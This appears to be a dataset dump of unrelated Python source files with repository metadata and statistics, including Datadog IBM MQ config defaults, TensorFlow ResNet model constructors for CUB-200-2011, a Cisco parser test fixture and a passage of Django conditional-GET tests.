rapidenv/git/__init__.py
|
innoviz-sw-infra/rapid-env
|
acc5e1e461af42b5fbb7024c0b79d4315c206fe2
|
[
"MIT"
] | null | null | null |
rapidenv/git/__init__.py
|
innoviz-sw-infra/rapid-env
|
acc5e1e461af42b5fbb7024c0b79d4315c206fe2
|
[
"MIT"
] | null | null | null |
from .git import add_gitignore
| 15.5
| 30
| 0.83871
| 5
| 31
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 31
| 1
| 31
| 31
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
bc60a34cff8e3ad297d167a268e5639eb89db5b4
| 47
|
py
|
Python
|
multiprocessing_tools/__init__.py
|
smwa/multiprocessing_tools
|
11f00f0cc12cf1b23a6e3a9daafaf8c98529a6e7
|
[
"MIT"
] | null | null | null |
multiprocessing_tools/__init__.py
|
smwa/multiprocessing_tools
|
11f00f0cc12cf1b23a6e3a9daafaf8c98529a6e7
|
[
"MIT"
] | null | null | null |
multiprocessing_tools/__init__.py
|
smwa/multiprocessing_tools
|
11f00f0cc12cf1b23a6e3a9daafaf8c98529a6e7
|
[
"MIT"
] | null | null | null |
from .multiprocessing_tools import map, filter
| 23.5
| 46
| 0.851064
| 6
| 47
| 6.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106383
| 47
| 1
| 47
| 47
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
bcbacb72bbd0a9a00efabf23e3328bbf0628fce2
| 375
|
py
|
Python
|
wordpress_xmlrpc/methods/__init__.py
|
hishamnajam/python-wordpress-xmlrpc
|
8270a9f629b7d097e59ac5c649f41c8c1ee322a8
|
[
"MIT"
] | 218
|
2015-01-12T02:05:07.000Z
|
2022-03-27T19:11:10.000Z
|
wordpress_xmlrpc/methods/__init__.py
|
kholidfu/python-wordpress-xmlrpc
|
7ac0a6e9934fdbf02c2250932e0c026cf530d400
|
[
"MIT"
] | 80
|
2015-01-17T18:52:05.000Z
|
2022-03-06T18:09:17.000Z
|
wordpress_xmlrpc/methods/__init__.py
|
kholidfu/python-wordpress-xmlrpc
|
7ac0a6e9934fdbf02c2250932e0c026cf530d400
|
[
"MIT"
] | 90
|
2015-01-25T22:41:37.000Z
|
2022-02-25T14:20:29.000Z
|
"""
Implementations of standard WordPress XML-RPC APIs.
"""
from wordpress_xmlrpc.methods import posts
from wordpress_xmlrpc.methods import pages
from wordpress_xmlrpc.methods import demo
from wordpress_xmlrpc.methods import users
from wordpress_xmlrpc.methods import options
from wordpress_xmlrpc.methods import comments
from wordpress_xmlrpc.methods import media
| 34.090909
| 52
| 0.837333
| 49
| 375
| 6.265306
| 0.367347
| 0.296417
| 0.433225
| 0.592834
| 0.729642
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122667
| 375
| 10
| 53
| 37.5
| 0.933131
| 0.136
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
4c4dd80fae46758e649d33cb53a3f626eb63a2a9
| 2,860
|
py
|
Python
|
ibm_mq/datadog_checks/ibm_mq/config_models/defaults.py
|
aymeric-ledizes/integrations-core
|
8386537099f5497a05192b97e69d97d47e316f78
|
[
"BSD-3-Clause"
] | null | null | null |
ibm_mq/datadog_checks/ibm_mq/config_models/defaults.py
|
aymeric-ledizes/integrations-core
|
8386537099f5497a05192b97e69d97d47e316f78
|
[
"BSD-3-Clause"
] | null | null | null |
ibm_mq/datadog_checks/ibm_mq/config_models/defaults.py
|
aymeric-ledizes/integrations-core
|
8386537099f5497a05192b97e69d97d47e316f78
|
[
"BSD-3-Clause"
] | null | null | null |
# (C) Datadog, Inc. 2021-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
# This file is autogenerated.
# To change this file you should edit assets/configuration/spec.yaml and then run the following commands:
# ddev -x validate config -s <INTEGRATION_NAME>
# ddev -x validate models -s <INTEGRATION_NAME>
from datadog_checks.base.utils.models.fields import get_default_field_value
def shared_service(field, value):
return get_default_field_value(field, value)
def instance_auto_discover_channels(field, value):
return True
def instance_auto_discover_queues(field, value):
return False
def instance_channel_status_mapping(field, value):
return get_default_field_value(field, value)
def instance_channels(field, value):
return get_default_field_value(field, value)
def instance_collect_statistics_metrics(field, value):
return False
def instance_connection_name(field, value):
return get_default_field_value(field, value)
def instance_convert_endianness(field, value):
return False
def instance_disable_generic_tags(field, value):
return False
def instance_empty_default_hostname(field, value):
return False
def instance_host(field, value):
return 'localhost'
def instance_metric_patterns(field, value):
return get_default_field_value(field, value)
def instance_min_collection_interval(field, value):
return 15
def instance_mqcd_version(field, value):
return 6
def instance_override_hostname(field, value):
return False
def instance_password(field, value):
return get_default_field_value(field, value)
def instance_port(field, value):
return 1414
def instance_queue_manager_timezone(field, value):
return 'Etc/UTC'
def instance_queue_patterns(field, value):
return get_default_field_value(field, value)
def instance_queue_regex(field, value):
return get_default_field_value(field, value)
def instance_queue_tag_re(field, value):
return get_default_field_value(field, value)
def instance_queues(field, value):
return get_default_field_value(field, value)
def instance_service(field, value):
return get_default_field_value(field, value)
def instance_ssl_auth(field, value):
return False
def instance_ssl_certificate_label(field, value):
return get_default_field_value(field, value)
def instance_ssl_cipher_spec(field, value):
return 'TLS_RSA_WITH_AES_256_CBC_SHA'
def instance_ssl_key_repository_location(field, value):
return '/var/mqm/ssl-db/client/KeyringClient'
def instance_tags(field, value):
return get_default_field_value(field, value)
def instance_timeout(field, value):
return 5
def instance_try_basic_auth(field, value):
return True
def instance_username(field, value):
return get_default_field_value(field, value)
| 21.185185
| 105
| 0.777972
| 399
| 2,860
| 5.275689
| 0.318296
| 0.285036
| 0.235629
| 0.142518
| 0.539192
| 0.539192
| 0.433729
| 0.395724
| 0.395724
| 0.373872
| 0
| 0.006563
| 0.147552
| 2,860
| 134
| 106
| 21.343284
| 0.85685
| 0.118881
| 0
| 0.365079
| 1
| 0
| 0.031847
| 0.025478
| 0
| 0
| 0
| 0
| 0
| 1
| 0.492063
| false
| 0.015873
| 0.015873
| 0.492063
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
4c705a57b2fcc686a66ac8e30bd435febf730fc5
| 14,084
|
py
|
Python
|
tensorflow2/tf2cv/models/resnet_cub.py
|
naviocean/imgclsmob
|
f2993d3ce73a2f7ddba05da3891defb08547d504
|
[
"MIT"
] | 2,649
|
2018-08-03T14:18:00.000Z
|
2022-03-31T08:08:17.000Z
|
tensorflow2/tf2cv/models/resnet_cub.py
|
naviocean/imgclsmob
|
f2993d3ce73a2f7ddba05da3891defb08547d504
|
[
"MIT"
] | 95
|
2018-08-13T01:46:03.000Z
|
2022-03-13T08:38:14.000Z
|
tensorflow2/tf2cv/models/resnet_cub.py
|
naviocean/imgclsmob
|
f2993d3ce73a2f7ddba05da3891defb08547d504
|
[
"MIT"
] | 549
|
2018-08-06T08:09:22.000Z
|
2022-03-31T08:08:21.000Z
|
"""
ResNet for CUB-200-2011, implemented in TensorFlow.
Original paper: 'Deep Residual Learning for Image Recognition,' https://arxiv.org/abs/1512.03385.
"""
__all__ = ['resnet10_cub', 'resnet12_cub', 'resnet14_cub', 'resnetbc14b_cub', 'resnet16_cub', 'resnet18_cub',
'resnet26_cub', 'resnetbc26b_cub', 'resnet34_cub', 'resnetbc38b_cub', 'resnet50_cub', 'resnet50b_cub',
'resnet101_cub', 'resnet101b_cub', 'resnet152_cub', 'resnet152b_cub', 'resnet200_cub', 'resnet200b_cub']
from .common import is_channels_first
from .resnet import get_resnet
def resnet10_cub(classes=200, **kwargs):
"""
ResNet-10 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385. It's an experimental model.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=10, model_name="resnet10_cub", **kwargs)
def resnet12_cub(classes=200, **kwargs):
"""
ResNet-12 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385. It's an experimental model.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=12, model_name="resnet12_cub", **kwargs)
def resnet14_cub(classes=200, **kwargs):
"""
ResNet-14 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385. It's an experimental model.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=14, model_name="resnet14_cub", **kwargs)
def resnetbc14b_cub(classes=200, **kwargs):
"""
ResNet-BC-14b model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385. It's an experimental model (bottleneck compressed).
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=14, bottleneck=True, conv1_stride=False, model_name="resnetbc14b_cub",
**kwargs)
def resnet16_cub(classes=200, **kwargs):
"""
ResNet-16 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385. It's an experimental model.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=16, model_name="resnet16_cub", **kwargs)
def resnet18_cub(classes=200, **kwargs):
"""
ResNet-18 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=18, model_name="resnet18_cub", **kwargs)
def resnet26_cub(classes=200, **kwargs):
"""
ResNet-26 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385. It's an experimental model.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=26, bottleneck=False, model_name="resnet26_cub", **kwargs)
def resnetbc26b_cub(classes=200, **kwargs):
"""
ResNet-BC-26b model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385. It's an experimental model (bottleneck compressed).
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=26, bottleneck=True, conv1_stride=False, model_name="resnetbc26b_cub",
**kwargs)
def resnet34_cub(classes=200, **kwargs):
"""
ResNet-34 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=34, model_name="resnet34_cub", **kwargs)
def resnetbc38b_cub(classes=200, **kwargs):
"""
ResNet-BC-38b model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385. It's an experimental model (bottleneck compressed).
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=38, bottleneck=True, conv1_stride=False, model_name="resnetbc38b_cub",
**kwargs)
def resnet50_cub(classes=200, **kwargs):
"""
ResNet-50 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=50, model_name="resnet50_cub", **kwargs)
def resnet50b_cub(classes=200, **kwargs):
"""
ResNet-50 model with stride at the second convolution in bottleneck block from 'Deep Residual Learning for Image
Recognition,' https://arxiv.org/abs/1512.03385.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=50, conv1_stride=False, model_name="resnet50b_cub", **kwargs)
def resnet101_cub(classes=200, **kwargs):
"""
ResNet-101 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=101, model_name="resnet101_cub", **kwargs)
def resnet101b_cub(classes=200, **kwargs):
"""
ResNet-101 model with stride at the second convolution in bottleneck block from 'Deep Residual Learning for Image
Recognition,' https://arxiv.org/abs/1512.03385.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=101, conv1_stride=False, model_name="resnet101b_cub", **kwargs)
def resnet152_cub(classes=200, **kwargs):
"""
ResNet-152 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=152, model_name="resnet152_cub", **kwargs)
def resnet152b_cub(classes=200, **kwargs):
"""
ResNet-152 model with stride at the second convolution in bottleneck block from 'Deep Residual Learning for Image
Recognition,' https://arxiv.org/abs/1512.03385.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=152, conv1_stride=False, model_name="resnet152b_cub", **kwargs)
def resnet200_cub(classes=200, **kwargs):
"""
ResNet-200 model for CUB-200-2011 from 'Deep Residual Learning for Image Recognition,'
https://arxiv.org/abs/1512.03385. It's an experimental model.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=200, model_name="resnet200_cub", **kwargs)
def resnet200b_cub(classes=200, **kwargs):
"""
ResNet-200 model with stride at the second convolution in bottleneck block from 'Deep Residual Learning for Image
Recognition,' https://arxiv.org/abs/1512.03385. It's an experimental model.
Parameters:
----------
classes : int, default 200
Number of classification classes.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_resnet(classes=classes, blocks=200, conv1_stride=False, model_name="resnet200b_cub", **kwargs)
def _test():
import numpy as np
import tensorflow as tf
import tensorflow.keras.backend as K
data_format = "channels_last"
# data_format = "channels_first"
pretrained = False
models = [
resnet10_cub,
resnet12_cub,
resnet14_cub,
resnetbc14b_cub,
resnet16_cub,
resnet18_cub,
resnet26_cub,
resnetbc26b_cub,
resnet34_cub,
resnetbc38b_cub,
resnet50_cub,
resnet50b_cub,
resnet101_cub,
resnet101b_cub,
resnet152_cub,
resnet152b_cub,
resnet200_cub,
resnet200b_cub,
]
for model in models:
net = model(pretrained=pretrained, data_format=data_format)
batch = 14
x = tf.random.normal((batch, 3, 224, 224) if is_channels_first(data_format) else (batch, 224, 224, 3))
y = net(x)
assert (tuple(y.shape.as_list()) == (batch, 200))
weight_count = sum([np.prod(K.get_value(w).shape) for w in net.trainable_weights])
print("m={}, {}".format(model.__name__, weight_count))
assert (model != resnet10_cub or weight_count == 5008392)
assert (model != resnet12_cub or weight_count == 5082376)
assert (model != resnet14_cub or weight_count == 5377800)
assert (model != resnetbc14b_cub or weight_count == 8425736)
assert (model != resnet16_cub or weight_count == 6558472)
assert (model != resnet18_cub or weight_count == 11279112)
assert (model != resnet26_cub or weight_count == 17549832)
assert (model != resnetbc26b_cub or weight_count == 14355976)
assert (model != resnet34_cub or weight_count == 21387272)
assert (model != resnetbc38b_cub or weight_count == 20286216)
assert (model != resnet50_cub or weight_count == 23917832)
assert (model != resnet50b_cub or weight_count == 23917832)
assert (model != resnet101_cub or weight_count == 42909960)
assert (model != resnet101b_cub or weight_count == 42909960)
assert (model != resnet152_cub or weight_count == 58553608)
assert (model != resnet152b_cub or weight_count == 58553608)
assert (model != resnet200_cub or weight_count == 63034632)
assert (model != resnet200b_cub or weight_count == 63034632)
if __name__ == "__main__":
_test()
| 36.487047
| 117
| 0.673246
| 1,716
| 14,084
| 5.417249
| 0.088578
| 0.04034
| 0.040878
| 0.047009
| 0.81207
| 0.777324
| 0.76861
| 0.710628
| 0.710628
| 0.710628
| 0
| 0.076685
| 0.219469
| 14,084
| 385
| 118
| 36.581818
| 0.768944
| 0.544093
| 0
| 0.030612
| 0
| 0
| 0.090942
| 0
| 0
| 0
| 0
| 0
| 0.193878
| 1
| 0.193878
| false
| 0
| 0.05102
| 0
| 0.428571
| 0.010204
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4c74f805f9da7d3322c4f31a25b5cd3622a8e969
| 584
|
py
|
Python
|
kratos_salome_plugin/exceptions.py
|
armingeiser/KratosSalomePlugin
|
d402ca9edef8dff071ceabf0ebac0d858a6fbfcc
|
[
"BSD-3-Clause"
] | 6
|
2020-01-23T20:54:17.000Z
|
2021-02-19T09:52:29.000Z
|
kratos_salome_plugin/exceptions.py
|
armingeiser/KratosSalomePlugin
|
d402ca9edef8dff071ceabf0ebac0d858a6fbfcc
|
[
"BSD-3-Clause"
] | 20
|
2020-01-25T16:05:43.000Z
|
2020-12-18T20:36:46.000Z
|
kratos_salome_plugin/exceptions.py
|
armingeiser/KratosSalomePlugin
|
d402ca9edef8dff071ceabf0ebac0d858a6fbfcc
|
[
"BSD-3-Clause"
] | 3
|
2020-05-27T13:31:08.000Z
|
2020-12-18T19:50:43.000Z
|
# _ __ _ ___ _ ___ _ _
# | |/ /_ _ __ _| |_ ___ __/ __| __ _| |___ _ __ ___| _ \ |_ _ __ _(_)_ _
# | ' <| '_/ _` | _/ _ (_-<__ \/ _` | / _ \ ' \/ -_) _/ | || / _` | | ' \
# |_|\_\_| \__,_|\__\___/__/___/\__,_|_\___/_|_|_\___|_| |_|\_,_\__, |_|_||_|
# |___/
# License: BSD License ; see LICENSE
#
# Main authors: Philipp Bucher (https://github.com/philbucher)
#
"""
This file defines the custom exceptions used in the plugin
"""
class UserInputError(Exception): pass
| 36.5
| 77
| 0.438356
| 27
| 584
| 5.777778
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.369863
| 584
| 15
| 78
| 38.933333
| 0.423913
| 0.886986
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
4c78e8d1f095a63005595b6589bc4487044f7dcc
| 989
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowL2vpnEvpnMac/cli/equal/golden_output2_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/iosxe/tests/ShowL2vpnEvpnMac/cli/equal/golden_output2_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/iosxe/tests/ShowL2vpnEvpnMac/cli/equal/golden_output2_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
# Copyright (c) 2021 by Cisco Systems, Inc.
# All rights reserved.
expected_output = {
'evi': {
1: {
'bd_id': {
11: {
'eth_tag': {
0 : {
'mac_addr':{
'0050.56a9.f5af': {
'esi': '0000.0000.0000.0000.0000',
'next_hops': [
'11.11.11.2'
]
},
'b4a8.b902.32d6': {
'esi': '0000.0000.0000.0000.0000',
'next_hops': [
'Gi1/0/3:11'
]
}
}
}
}
}
}
}
}
}
| 31.903226
| 70
| 0.194135
| 52
| 989
| 3.576923
| 0.673077
| 0.344086
| 0.387097
| 0.344086
| 0.333333
| 0.333333
| 0.333333
| 0.333333
| 0
| 0
| 0
| 0.265734
| 0.710819
| 989
| 30
| 71
| 32.966667
| 0.384615
| 0.06269
| 0
| 0.142857
| 0
| 0
| 0.154762
| 0.051948
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4c7a32cba279139a9f0a14c6c22b13474fecd425
| 12,885
|
py
|
Python
|
tests/conditional_processing/tests.py
|
ni-ning/django
|
2e7ba6057cfc82a15a22b6021cd60cf307152e2d
|
[
"CNRI-Python-GPL-Compatible",
"BSD-3-Clause"
] | 61,676
|
2015-01-01T00:05:13.000Z
|
2022-03-31T20:37:54.000Z
|
tests/conditional_processing/tests.py
|
ni-ning/django
|
2e7ba6057cfc82a15a22b6021cd60cf307152e2d
|
[
"CNRI-Python-GPL-Compatible",
"BSD-3-Clause"
] | 8,884
|
2015-01-01T00:12:05.000Z
|
2022-03-31T19:53:11.000Z
|
tests/conditional_processing/tests.py
|
mustafa0x/django
|
d7394cfa13a4d1a02356e3a83e10ec100fbb9948
|
[
"BSD-3-Clause",
"0BSD"
] | 33,143
|
2015-01-01T02:04:52.000Z
|
2022-03-31T19:42:46.000Z
|
from datetime import datetime
from django.test import SimpleTestCase, override_settings
FULL_RESPONSE = 'Test conditional get response'
LAST_MODIFIED = datetime(2007, 10, 21, 23, 21, 47)
LAST_MODIFIED_STR = 'Sun, 21 Oct 2007 23:21:47 GMT'
LAST_MODIFIED_NEWER_STR = 'Mon, 18 Oct 2010 16:56:23 GMT'
LAST_MODIFIED_INVALID_STR = 'Mon, 32 Oct 2010 16:56:23 GMT'
EXPIRED_LAST_MODIFIED_STR = 'Sat, 20 Oct 2007 23:21:47 GMT'
ETAG = '"b4246ffc4f62314ca13147c9d4f76974"'
WEAK_ETAG = 'W/"b4246ffc4f62314ca13147c9d4f76974"' # weak match to ETAG
EXPIRED_ETAG = '"7fae4cd4b0f81e7d2914700043aa8ed6"'
@override_settings(ROOT_URLCONF='conditional_processing.urls')
class ConditionalGet(SimpleTestCase):
def assertFullResponse(self, response, check_last_modified=True, check_etag=True):
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, FULL_RESPONSE.encode())
if response.request['REQUEST_METHOD'] in ('GET', 'HEAD'):
if check_last_modified:
self.assertEqual(response.headers['Last-Modified'], LAST_MODIFIED_STR)
if check_etag:
self.assertEqual(response.headers['ETag'], ETAG)
else:
self.assertNotIn('Last-Modified', response.headers)
self.assertNotIn('ETag', response.headers)
def assertNotModified(self, response):
self.assertEqual(response.status_code, 304)
self.assertEqual(response.content, b'')
def test_without_conditions(self):
response = self.client.get('/condition/')
self.assertFullResponse(response)
def test_if_modified_since(self):
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
response = self.client.get('/condition/')
self.assertNotModified(response)
response = self.client.put('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_NEWER_STR
response = self.client.get('/condition/')
self.assertNotModified(response)
response = self.client.put('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_INVALID_STR
response = self.client.get('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
response = self.client.get('/condition/')
self.assertFullResponse(response)
def test_if_unmodified_since(self):
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_STR
response = self.client.get('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_NEWER_STR
response = self.client.get('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_INVALID_STR
response = self.client.get('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
response = self.client.get('/condition/')
self.assertEqual(response.status_code, 412)
def test_if_none_match(self):
self.client.defaults['HTTP_IF_NONE_MATCH'] = ETAG
response = self.client.get('/condition/')
self.assertNotModified(response)
response = self.client.put('/condition/')
self.assertEqual(response.status_code, 412)
self.client.defaults['HTTP_IF_NONE_MATCH'] = EXPIRED_ETAG
response = self.client.get('/condition/')
self.assertFullResponse(response)
# Several etags in If-None-Match is a bit exotic but why not?
self.client.defaults['HTTP_IF_NONE_MATCH'] = '%s, %s' % (ETAG, EXPIRED_ETAG)
response = self.client.get('/condition/')
self.assertNotModified(response)
def test_weak_if_none_match(self):
"""
If-None-Match comparisons use weak matching, so weak and strong ETags
with the same value result in a 304 response.
"""
self.client.defaults['HTTP_IF_NONE_MATCH'] = ETAG
response = self.client.get('/condition/weak_etag/')
self.assertNotModified(response)
response = self.client.put('/condition/weak_etag/')
self.assertEqual(response.status_code, 412)
self.client.defaults['HTTP_IF_NONE_MATCH'] = WEAK_ETAG
response = self.client.get('/condition/weak_etag/')
self.assertNotModified(response)
response = self.client.put('/condition/weak_etag/')
self.assertEqual(response.status_code, 412)
response = self.client.get('/condition/')
self.assertNotModified(response)
response = self.client.put('/condition/')
self.assertEqual(response.status_code, 412)
def test_all_if_none_match(self):
self.client.defaults['HTTP_IF_NONE_MATCH'] = '*'
response = self.client.get('/condition/')
self.assertNotModified(response)
response = self.client.put('/condition/')
self.assertEqual(response.status_code, 412)
response = self.client.get('/condition/no_etag/')
self.assertFullResponse(response, check_last_modified=False, check_etag=False)
def test_if_match(self):
self.client.defaults['HTTP_IF_MATCH'] = ETAG
response = self.client.put('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_MATCH'] = EXPIRED_ETAG
response = self.client.put('/condition/')
self.assertEqual(response.status_code, 412)
def test_weak_if_match(self):
"""
If-Match comparisons use strong matching, so any comparison involving
a weak ETag return a 412 response.
"""
